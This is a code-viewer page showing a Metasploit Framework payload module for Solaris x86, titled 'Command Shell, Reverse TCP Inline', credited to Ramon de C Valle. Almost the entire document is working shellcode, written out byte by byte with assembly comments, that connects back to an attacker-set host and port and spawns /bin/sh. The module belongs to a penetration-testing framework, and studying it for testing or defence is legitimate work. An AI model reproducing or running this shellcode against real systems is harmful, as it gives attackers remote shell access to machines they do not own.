Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb
Views: 11778
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##456module MetasploitModule78CachedSize = 91910include Msf::Payload::Single11include Msf::Payload::Solaris12include Msf::Sessions::CommandShellOptions1314def initialize(info = {})15super(merge_info(info,16'Name' => 'Solaris Command Shell, Reverse TCP Inline',17'Description' => 'Connect back to attacker and spawn a command shell',18'Author' => 'Ramon de C Valle',19'License' => MSF_LICENSE,20'Platform' => 'solaris',21'Arch' => ARCH_X86,22'Handler' => Msf::Handler::ReverseTcp,23'Session' => Msf::Sessions::CommandShellUnix,24'Payload' =>25{26'Offsets' =>27{28'LHOST' => [ 15, 'ADDR' ],29'LPORT' => [ 21, 'n' ],30},31'Payload' =>32"\x68\xff\xd8\xff\x3c" + # pushl $0x3cffd8ff #33"\x6a\x65" + # pushl $0x65 #34"\x89\xe6" + # movl %esp,%esi #35"\xf7\x56\x04" + # notl 0x04(%esi) #36"\xf6\x16" + # notb (%esi) #37"\x68\x7f\x01\x01\x01" + # pushl $0x0101017f #38"\x66\x68\x04\xd2" + # pushw $0xd204 #39"\x66\x6a\x02" + # pushw $0x02 #40"\x89\xe7" + # movl %esp,%edi #41"\x6a\x02" + # pushl $0x02 #42"\x31\xc0" + # xorl %eax,%eax #43"\x50" + # pushl %eax #44"\x50" + # pushl %eax #45"\x6a\x02" + # pushl $0x02 #46"\x6a\x02" + # pushl $0x02 #47"\xb0\xe6" + # movb $0xe6,%al #48"\xff\xd6" + # call *%esi #49"\x6a\x10" + # pushl $0x10 #50"\x57" + # pushl %edi #51"\x50" + # pushl %eax #52"\x31\xc0" + # xorl %eax,%eax #53"\xb0\xeb" + # movb $0xeb,%al #54"\xff\xd6" + # call *%esi #55"\x5b" + # popl %ebx #56"\x53" + # pushl %ebx #57"\x6a\x09" + # pushl $0x09 #58"\x53" + # pushl %ebx #59"\x6a\x3e" + # pushl $0x3e #60"\x58" + # popl %eax #61"\xff\xd6" + # call *%esi #62"\xff\x4f\xe0" + # decl -0x20(%edi) #63"\x79\xf6" + # jns <cntsockcode+57> #64"\x50" + # pushl %eax #65"\x68\x2f\x2f\x73\x68" + # pushl $0x68732f2f #66"\x68\x2f\x62\x69\x6e" + # pushl $0x6e69622f #67"\x89\xe3" + # movl %esp,%ebx #68"\x50" + # pushl %eax #69"\x53" + # pushl %ebx #70"\x89\xe1" + # movl %esp,%ecx #71"\x50" + # pushl %eax #72"\x51" + # pushl %ecx #73"\x53" + # pushl %ebx #74"\xb0\x3b" + # movb $0x3b,%al #75"\xff\xd6" # call *%esi #76}77))78end79end808182